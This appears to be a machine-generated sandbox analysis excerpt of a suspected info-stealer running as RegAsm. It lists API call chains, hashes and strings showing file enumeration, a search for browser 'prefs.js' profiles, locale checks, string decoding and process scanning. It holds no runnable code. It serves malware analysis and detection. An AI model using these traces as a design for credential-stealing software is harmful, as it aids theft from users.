                                              • Opcode Fuzzy Hash: 92626a6cdc1c63cf4d2f8abad645325172b0a80dbff1d5aa29874edd3c670153
                                              • Instruction Fuzzy Hash: 3AC18574900249EACF10EBB5C9467DD7FB8AF19304F50415EE855A32C2DBB85B88CBA7
                                              APIs
                                              • _EH_prolog.MSVCRT ref: 0040A59A
                                                • Part of subcall function 0041070B: lstrcpy.KERNEL32(00000000,00000000), ref: 00410735
                                                • Part of subcall function 00410884: _EH_prolog.MSVCRT ref: 00410889
                                                • Part of subcall function 00410884: lstrlenA.KERNEL32(?,?,?,?,?,0041874B,?,?,00427BD8,?,00000000,00427716), ref: 004108B1
                                                • Part of subcall function 00410884: lstrcpy.KERNEL32(00000000), ref: 004108D8
                                                • Part of subcall function 00410884: lstrcat.KERNEL32(?,?), ref: 004108E3
                                                • Part of subcall function 004107C9: lstrcpy.KERNEL32(00000000,?), ref: 00410802
                                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00426C53,00000000,74E1AC90), ref: 0040A5F9
                                              • StrCmpCA.SHLWAPI(?,00426E8C), ref: 0040A616
                                              • StrCmpCA.SHLWAPI(?,00426E90), ref: 0040A630
                                                • Part of subcall function 00410810: _EH_prolog.MSVCRT ref: 00410815
                                                • Part of subcall function 00410810: lstrcpy.KERNEL32(00000000), ref: 00410861
                                                • Part of subcall function 00410810: lstrcat.KERNEL32(?,?), ref: 0041086B
                                                • Part of subcall function 00411944: _EH_prolog.MSVCRT ref: 00411949
                                                • Part of subcall function 00411944: GetSystemTime.KERNEL32(?,004274F0,00000001,000000C8,00000000,0042770F), ref: 00411989
                                                • Part of subcall function 00406CC8: _EH_prolog.MSVCRT ref: 00406CCD
                                                • Part of subcall function 00406CC8: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 00406CF0
                                                • Part of subcall function 00406CC8: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 00406D07
                                                • Part of subcall function 00406CC8: LocalAlloc.KERNEL32(00000040,?,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 00406D23
                                                • Part of subcall function 00406CC8: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,?,?,?,00000000), ref: 00406D3D
                                                • Part of subcall function 00406CC8: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 00406D5E
                                                • Part of subcall function 00410742: lstrcpy.KERNEL32(00000000,FEE0858D), ref: 00410768
                                                • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                • Part of subcall function 00415865: _EH_prolog.MSVCRT ref: 0041586A
                                                • Part of subcall function 00415865: CreateThread.KERNEL32(00000000,00000000,00414052,?,00000000,00000000), ref: 00415910
                                                • Part of subcall function 00415865: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 00415918
                                              • FindNextFileA.KERNEL32(00000000,?), ref: 0040AB9C
                                              • FindClose.KERNEL32(00000000), ref: 0040ABAB
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: H_prolog$Filelstrcpy$Find$CloseCreatelstrcat$AllocFirstHandleLocalNextObjectReadSingleSizeSystemThreadTimeWaitlstrlen
                                              • String ID: "$\*.*
                                              • API String ID: 1275501236-2874818444
                                              • Opcode ID: fee58b1a2a8577c94b7521fe7edc383d53312c93be2b8cb8f45bfe2ce1725cf9
                                              • Instruction ID: e46e9c3d9c55cb5b869c549ec544e4eef9c490dfa8f6b3faf50b226075c023b1
                                              • Opcode Fuzzy Hash: fee58b1a2a8577c94b7521fe7edc383d53312c93be2b8cb8f45bfe2ce1725cf9
                                              • Instruction Fuzzy Hash: C912707180114DEADB15EBA5C955BEEBBB8AF15308F10419EE105631C2DFB82BC8CFA5
                                              APIs
                                              • _EH_prolog.MSVCRT ref: 0040C0FD
                                                • Part of subcall function 0041070B: lstrcpy.KERNEL32(00000000,00000000), ref: 00410735
                                                • Part of subcall function 00410810: _EH_prolog.MSVCRT ref: 00410815
                                                • Part of subcall function 00410810: lstrcpy.KERNEL32(00000000), ref: 00410861
                                                • Part of subcall function 00410810: lstrcat.KERNEL32(?,?), ref: 0041086B
                                                • Part of subcall function 00410884: _EH_prolog.MSVCRT ref: 00410889
                                                • Part of subcall function 00410884: lstrlenA.KERNEL32(?,?,?,?,?,0041874B,?,?,00427BD8,?,00000000,00427716), ref: 004108B1
                                                • Part of subcall function 00410884: lstrcpy.KERNEL32(00000000), ref: 004108D8
                                                • Part of subcall function 00410884: lstrcat.KERNEL32(?,?), ref: 004108E3
                                                • Part of subcall function 004107C9: lstrcpy.KERNEL32(00000000,?), ref: 00410802
                                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,00426FC0,?,?,00426C9E,?,00000000,?), ref: 0040C17C
                                              • StrCmpCA.SHLWAPI(?,00426FC4,?,00000000,?), ref: 0040C1A0
                                              • StrCmpCA.SHLWAPI(?,00426FC8,?,00000000,?), ref: 0040C1BA
                                              • StrCmpCA.SHLWAPI(?,prefs.js,00000000,?,?,?,00426FCC,?,?,00426C9F,?,00000000,?), ref: 0040C256
                                                • Part of subcall function 00411944: _EH_prolog.MSVCRT ref: 00411949
                                                • Part of subcall function 00411944: GetSystemTime.KERNEL32(?,004274F0,00000001,000000C8,00000000,0042770F), ref: 00411989
                                              • FindNextFileA.KERNEL32(?,?,?,00000000,?), ref: 0040C4DF
                                              • FindClose.KERNEL32(?,?,00000000,?), ref: 0040C4F0
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: H_prologlstrcpy$Find$Filelstrcat$CloseFirstNextSystemTimelstrlen
                                              • String ID: prefs.js
                                              • API String ID: 3307916976-3783873740
                                              • Opcode ID: cb1b43d1a985153124c9ca7fc9298b7660e5f5c10cb5b73b0d654c52ca1285ac
                                              • Instruction ID: b7d268ecd0f73e6739084cc28569164c6df36d410f19590cf288e92f0d628979
                                              • Opcode Fuzzy Hash: cb1b43d1a985153124c9ca7fc9298b7660e5f5c10cb5b73b0d654c52ca1285ac
                                              • Instruction Fuzzy Hash: 94D1B971900248EEDF14EBF5D956BDD7BB4AF19304F10419EE415A31C2DBB82B88CBA6
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true
                                              • Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 77e3198e6f7e4fed7d99e4de022067f2d20b89a3626f5b9df4e586ea4224d035
                                              • Instruction ID: a16078fa2c334eb452f9fba0da9aaa9e37731df3d04cfe27af0ab2f04947810e
                                              • Opcode Fuzzy Hash: 77e3198e6f7e4fed7d99e4de022067f2d20b89a3626f5b9df4e586ea4224d035
                                              • Instruction Fuzzy Hash: 25C149B6E593424FEB009A18DC82BDB77D1EF92315F9C052EF485873A3E225E585C782
                                              APIs
                                              • _EH_prolog.MSVCRT ref: 00410AD2
                                                • Part of subcall function 0041070B: lstrcpy.KERNEL32(00000000,00000000), ref: 00410735
                                              • GetKeyboardLayoutList.USER32(00000000,00000000,00427307,00000001,?,00000000), ref: 00410B04
                                              • LocalAlloc.KERNEL32(00000040,00000000,?,00000000), ref: 00410B12
                                              • GetKeyboardLayoutList.USER32(00000000,00000000,?,00000000), ref: 00410B1D
                                              • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200,?,00000000), ref: 00410B47
                                                • Part of subcall function 00410884: _EH_prolog.MSVCRT ref: 00410889
                                                • Part of subcall function 00410884: lstrlenA.KERNEL32(?,?,?,?,?,0041874B,?,?,00427BD8,?,00000000,00427716), ref: 004108B1
                                                • Part of subcall function 00410884: lstrcpy.KERNEL32(00000000), ref: 004108D8
                                                • Part of subcall function 00410884: lstrcat.KERNEL32(?,?), ref: 004108E3
                                                • Part of subcall function 004107C9: lstrcpy.KERNEL32(00000000,?), ref: 00410802
                                              • LocalFree.KERNEL32(?), ref: 00410BEB
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: lstrcpy$H_prologKeyboardLayoutListLocal$AllocFreeInfoLocalelstrcatlstrlen
                                              • String ID: /
                                              • API String ID: 2868853201-4001269591
                                              • Opcode ID: cb95bf2d00b02f6fa2e10ba2c9c21ff4ddfd16a58d507e3c7a07e4742ec5a4a1
                                              • Instruction ID: fd254bab53c17c7027ff5cf79a006a85c0399be6dbd245cf34b44f703b6fb313
                                              • Opcode Fuzzy Hash: cb95bf2d00b02f6fa2e10ba2c9c21ff4ddfd16a58d507e3c7a07e4742ec5a4a1
                                              • Instruction Fuzzy Hash: B4313E71901119AFDB14EFE5C889AEEB7B9FF09344F10405EF615A7141C7785AC4CBA4
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true
                                              • Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: db773b0ae705fc7df72fb0d7e8afe25b70c1965c09083eaff676e2a3f3cd3ee8
                                              • Instruction ID: 012bbd59a88cba75012365d78b089e0c90236291521442daa34d990048222b68
                                              • Opcode Fuzzy Hash: db773b0ae705fc7df72fb0d7e8afe25b70c1965c09083eaff676e2a3f3cd3ee8
                                              • Instruction Fuzzy Hash: D0E123B1A053029FC701DF35D981ABBB7F4BF65640F084A5DF885AB251E738E854CBA2
                                              Strings
                                              • , xrefs: 1B725334
                                              • REPLACE INTO '%q'.'%q_data'(id, block) VALUES(?,?), xrefs: 1B725264
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true
                                              • Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: $REPLACE INTO '%q'.'%q_data'(id, block) VALUES(?,?)
                                              • API String ID: 0-69911113
                                              • Opcode ID: 18b7786aa9976fbd9380cd54106b80bd48212e22ce6365ce5c9d745566350540
                                              • Instruction ID: c775fae2b0c09d06cabb9f7c47c538ff66f4baa049164dd05a1f18be11431441
                                              • Opcode Fuzzy Hash: 18b7786aa9976fbd9380cd54106b80bd48212e22ce6365ce5c9d745566350540
                                              • Instruction Fuzzy Hash: 3A419EB5900301AFDB00DF29DC80B9AB7E5FF88308F450569F989E7251E771E950CB92
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true
                                              • Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 8fd5a444f62547b55e1c478906cffc6cc5e8d8fd97acf4dcf33dab7dbce9423b
                                              • Instruction ID: 13677d3370b5a79a2d671471c4d7db52a746e73577f04e4305b20dfedeb68691
                                              • Opcode Fuzzy Hash: 8fd5a444f62547b55e1c478906cffc6cc5e8d8fd97acf4dcf33dab7dbce9423b
                                              • Instruction Fuzzy Hash: 0D41C1B5500742ABDB009F25DC81E9BB7E8FF45351F004A2CF85986260E772E916CBA6
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true
                                              • Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 43830c2c14d87b3ae716c7a1980d3d4f048575f12cac28b556fe9d979f0dcba0
                                              • Instruction ID: 0541e503406bf87e95db1c143ce62e0ddd6f03844758f4eb8943594403123a92
                                              • Opcode Fuzzy Hash: 43830c2c14d87b3ae716c7a1980d3d4f048575f12cac28b556fe9d979f0dcba0
                                              • Instruction Fuzzy Hash: 4641DEB5605301DFDB14DF18E884AA6B7E4FFA8320F10446DE9918B691E762F9548B60
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true
                                              • Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: a606322fb3e48be00025eb310d2f350fa0c3c0e84438e9cc3f1834479693f0cf
                                              • Instruction ID: acfb3e16d93dbacc22630d23315986e57309b2c3294c35c43dcc0d593d646431
                                              • Opcode Fuzzy Hash: a606322fb3e48be00025eb310d2f350fa0c3c0e84438e9cc3f1834479693f0cf
                                              • Instruction Fuzzy Hash: 3131D175600201DFDB50CF29D885AAAB3F4FF84325B1445B9E9428F262D732FC92DBA0
                                              APIs
                                              • memset.MSVCRT ref: 00408E45
                                              • lstrlenA.KERNEL32(?,00000001,?,00409236,00000000,00000000,00000000,?,00409236,00000014,?,?,?,?,?), ref: 00408E5F
                                              • CryptStringToBinaryA.CRYPT32(?,00000000,?,00409236,00000014), ref: 00408E69
                                              • memcpy.MSVCRT ref: 00408ED1
                                              • lstrcat.KERNEL32(00426C33,00426C37), ref: 00408EF8
                                              • lstrcat.KERNEL32(00426C33,00426C3A), ref: 00408F10
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: lstrcat$BinaryCryptStringlstrlenmemcpymemset
                                              • String ID:
                                              • API String ID: 1498829745-0
                                              • Opcode ID: 6ee5ec2687958f12fb782d22c65e92939e7cfbc03c4982da4d0e26e94fb7d57e
                                              • Instruction ID: 9f00ca1e45452c464c5f39282d346b9be538d73cb207fa6405665cf7f1909882
                                              • Opcode Fuzzy Hash: 6ee5ec2687958f12fb782d22c65e92939e7cfbc03c4982da4d0e26e94fb7d57e
                                              • Instruction Fuzzy Hash: A2218D7190011EEFDB109F98DE849EEBBBDEF04344F10047AF505F2241DB388A559BA9
                                              APIs
                                              • _EH_prolog.MSVCRT ref: 00411FAB
                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00411FD1
                                              • Process32First.KERNEL32(00000000,00000128), ref: 00411FE1
                                              • Process32Next.KERNEL32(00000000,00000128), ref: 00411FF3
                                              • StrCmpCA.SHLWAPI(?,?,?,?,00000000), ref: 00412007
                                              • CloseHandle.KERNEL32(00000000,?,?,00000000), ref: 0041201A
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Process32$CloseCreateFirstH_prologHandleNextSnapshotToolhelp32
                                              • String ID:
                                              • API String ID: 186290926-0
                                              • Opcode ID: 75b53a094b964750c471d917b4155db685f8e40c81acb4742c048d445ed2e5c1
                                              • Instruction ID: 6701b773630fbe07c067c797b8fb54358af9575d8ffcb44293aa9581e714d063
                                              • Opcode Fuzzy Hash: 75b53a094b964750c471d917b4155db685f8e40c81acb4742c048d445ed2e5c1
                                              • Instruction Fuzzy Hash: 60015A76900018EBCB219F55DD88AEEBBBAEB8A704F104156F601E2210D7788F81CBA5
                                              Strings
                                              • REPLACE INTO '%q'.'%q_data'(id, block) VALUES(?,?), xrefs: 1B702001
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true
                                              • Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: REPLACE INTO '%q'.'%q_data'(id, block) VALUES(?,?)
                                              • API String ID: 0-914542581
                                              • Opcode ID: b5a679f610ff1563acda1b074d3e322d6abe80ccc5cdba6b984f8d5881fc8b87
